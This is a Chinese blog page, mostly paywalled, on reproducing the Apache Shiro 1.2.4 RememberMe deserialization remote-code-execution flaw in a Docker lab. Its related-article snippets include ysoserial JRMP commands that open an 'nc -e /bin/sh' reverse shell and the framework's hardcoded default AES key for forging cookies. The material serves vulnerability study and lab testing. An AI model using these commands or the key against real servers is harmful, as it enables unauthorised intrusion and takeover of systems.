Shiro RememberMe 1.2.4 反序列化命令执行漏洞复现

最新推荐文章于 2025-05-28 17:34:46 发布
最新推荐文章于 2025-05-28 17:34:46 发布
阅读量6.7k 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: RCE 文章标签: shiro
本文为博主原创文章,未经博主允许不得转载,否则追究法律责任。
本文链接:https://blog.youkuaiyun.com/yiqiushi4748/article/details/103667981
本文详细介绍了Apache Shiro 1.2.4版本中的RememberMe功能存在的反序列化命令执行漏洞。影响版本为Apache Shiro <= 1.2.4,其默认使用的commons-collections版本为3.2.1。在环境搭建后,通过抓包测试发现响应中包含'rememberme',表明存在漏洞。进一步的漏洞复现步骤包括监听回弹shell、利用ysoserial的JRMP监听模块生成payload并重放,最终成功触发漏洞,获取shell。在Windows环境中,需要结合其他工具进行操作。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

影响版本

Apache Shiro <= 1.2.4

默认shiro的commons-collections版本为3.2.1,
在这里插入图片描述

环境搭建

在这里插入图片描述
在这里插入图片描述

漏洞测试

  1. 抓包测试

查看返回包里setcookie有rememberme的字样
在这里插入图片描述
继续测试
首先最简单的测试方法是用dnslog,看看是否有回显。
利用密钥生成rememberMe

在这里插入图片描述

在这里插入图片描述

最低0.47元/天 解锁文章

200万优质内容无限畅学
Apache Shiro=1.2.4反序列化RCE漏洞
墨痕诉清风的博客
10-09 1349
因为shiro对cookie里的rememberme字段进行了反序列化,所以如果知道了shiro的编码方式,然后将恶意命令用它的编码方式进行编码并放在http头的cookie里,在shiro对提交的cookie的rememberme字段进行反序列化时,也就执行了插入的命令,最终造成了命令执行。Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。的,就导致了攻击者可以构造恶意数据造成反序列化的RCE漏洞。,已经有人准备好了的。...
Shiro RememberMe 1.2.4 反序列化命令执行漏洞复现 kali docker
mohanhan
06-23 2578
Shiro RememberMe 1.2.4 反序列化命令执行漏洞复现漏洞环境搭建漏洞复现反弹shell题外话1题外话2 影响版本:Apache Shiro <= 1.2.4 漏洞产生原因: shiro默认使用了CookieRememberMeManager,其处理cookie的流程是:得到rememberMe的cookie值–>Base64解码–>AES解密–>反序列化。 然而AES的密钥是硬编码的,就导致了攻击者可以构造恶意数据造成反序列化的RCE漏洞。使用大佬脚本生成 payl
Apache Shiro RememberMe 1.2.4 反序列化过程命令执行漏洞【原理扫描】
Gblfy_Blog
12-06 4530
文章目录一、分析定位1. 漏洞描述2. 项目引发漏洞简述二、解决方案2.1. 若依系统2.2. Gus系统 一、分析定位 1. 漏洞描述 目前厂商已经发布了新版本修复这个安全问题,请到厂商的主页下载: https://issues.apache.org/jira/browse/SHIRO-550 https://shiro.apache.org/download.html 2. 项目引发漏洞简述 若依/Guns管理系统使用了Apache ShiroShiro 提供了记住我(RememberM
框架漏洞2shiro
最新发布
m0_73399576的博客
05-28 894
知识面,决定看到的攻击面有多广。知识链,决定发动的杀伤链有多深。
php5.5 反序列化利用工具_【漏洞复现Shiro RememberMe 1.2.4 反序列化命令执行漏洞...
weixin_39619433的博客
11-26 450
0x00 影响版本Apache Shiro <= 1.2.40x01 原因分析Apache Shiro默认使用了CookieRememberMeManager,其处理cookie的流程是:得到rememberMe的cookie值 > Base64解码–>AES解密–>反序列化。然而AES的密钥是硬编码的,就导致了攻击者可以构造恶意数据造成反序列化的RCE...
ShiroScan:Shiro RememberMe 1.2.4反序列化入侵图形化检测工具(Shiro-550)
03-18
Shiro反序列化检测工具 ShiroScan用于检测存在四郎反序列化漏洞的关键值。有三种方式进行检测,第一种是利用URLDNS进行检测,第二种利用命令执行进行检测,第三种使用SimplePrincipalCollection序列化后进行检测...
Shiro RememberMe 1.2.4 反序列化漏洞(SSV-92180)
你和萤火虫有两个共同点,在我的眼里都会发光,同时,都已经很多年没见了
06-21 3849
1Shiro运行环境 Apache Shiro 是 Java 的权限及安全验证框架 下载地址:https://repo1.maven.org/maven2/org/apache/shiro/shiro-root/1.2.4/ 修改pom.xml包中jstl和commons-beanutils的版本,用于配合漏洞执行环境 <dependency> <groupId>javax.servlet</groupId> <artifactId>jstl
SHIRO-550:Shiro RememberMe 1.2.4反序列化突破
03-10
Shiro RememberMe 1.2.4反序列化突破(SHIRO-550) commons-collections-3.2.1.jar java -jar ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient "10.10.20.166:12345" |python exp.py java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 12345 CommonsCollections5 'nc -e /bin/sh 192.168.5.86 8989' nc -nlvp 8989 python用法: python3 shiro_rce.py _____ _ _ _____ _____ ____ _____ _____ __
Apache Shiro RememberMe 1.2.4 反序列化漏洞
ddr12231的博客
08-08 1678
拉取镜像 docker pull medicean/vulapps:s_shiro_1 启动环境 docker run -d -p 80:8080 medicean/vulapps:s_shiro_1 拉取镜像中.....呵呵 ! 网太慢,有时间再弄 转载于:https://www.cnblogs.com/mrhonest/p/11320498.html...
Shiro RememberMe 1.2.4 反序列化漏洞(Shiro-550, CVE-2016-4437)复现
whojoe的博客
05-10 1550
Shiro RememberMe 1.2.4 反序列化漏洞复现前言开始环境搭建工具准备1.shiro_poc.py2.ysoserial的jar文件安装模块开始执行参考文章 前言 接下来一段时间要做漏洞复现和代码审计,算是一个小目标把 开始 环境搭建 使用docker复现 启动docker systemctl start docker 下载镜像和启动环境 docker pull medicean/vulapps:s_shiro_1 docker run -d -p 81:8080 medicean/vul
Shiro1.2.4反序列化漏洞检测与复现
qq_45396375的博客
12-20 1889
用户勾选RememberMe登录后,shiro框架将用户信息进行序列化,序列化的内容进行AES加密,再使用base64编码,最后给用户返回一个rememberMe的cookie。 而AES加密采用了一个固定的key kPH+bIxk5D2deZiIxcaaaA==,因此攻击者可以构造恶意的代码,将恶意代码进行序列化,再通过固定key对恶意代码进行AES加密,再base64编码 攻击者将这段恶意数据替换为正常的cookie值,这段cookie值发到后台后,shiro框架会将这段加密数据进行base64解码,
Apache Shiro 1.2.4反序列化漏洞(CVE-2016-4437)
m0_61506558的博客
11-06 2929
关于shiro2019年爆出来的漏洞,利用的条件相对来说比较苛刻,不仅要有一定的权限登入进去,进去之后密钥爆破也不一定可以成功,环境不好搭建,感兴趣的师傅可以看看,本篇文章介绍的是有关shiro反序列化漏洞,(一)基本介绍。
漏洞复现系列--Shiro RememberMe 1.2.4 反序列化漏洞
梦之旅行地
02-05 2699
1漏洞利用前提: Apache Shiro <= 1.2.4 2、靶场: 利用vulhub的靶场在服务器上搭建 注:docker相关配置就没有写了,靶场能运行就行 靶场搭建 git clone https://github.com/vulhub/vulhub.git cd /vulhub/shiro/CVE-2016-4437 docker-compose up -d #启动靶场 启...
漏洞复现Shiro 反序列化漏洞
2301_80115097的博客
11-08 2517
Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。该款工具特别适合初学者,配置了各种OA漏洞利用板块,还有shiro、struts2等框架漏洞漏洞利用板块,还有一键执行命令的功能!!
Shiro RememberMe 1.2.4 反序列化漏洞详细复现
weixin_38166689的博客
08-07 2216
0x00 前言 今天上班的时候收到了一个复测的任务,打开一看,shiro反序列化漏洞,What?这是个什么东西,经百度查找后才知道,原来是Java的开发框架,好吧,还是没听说过。。由于初测报告上的过程过于简略(唯一有用的只有KEY),所以不得不自己研究一番了。 0x01 环境搭建 漏洞版本<=1.2.4,使用docker搭建 docker pull medicean...
漏洞复现】最简洁的Shiro RememberMe 1.2.4 反序列化命令执行漏洞
T_Snail_T的博客
04-03 4533
0x00 前言 最近在内网进行测试,朋友跟我说在内网这种漏洞比较多,记得这个漏洞是很久之前就爆出来了,当时只是看了一下复现文档,没有进行实操,正好这次复现了,在这里记录一下,而且我这里使用的办法比网上大部分文章都相对简洁,很适合跟我一样的小白复现。 0x01 服务器环境安装 直接使用docker进行环境的安装 docker pull medicean/vulapps:s_shiro_1 安装好...
Shiro rememberMe反序列化漏洞(Shiro-550)
2201_75891821的博客
08-07 376
Apache Shiro是⼀个强⼤易⽤的Java安全框架,提供了认证、授权、加密和会话管理等功 能。Shiro框架直观、易⽤,同时也能提供健壮的安全性。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值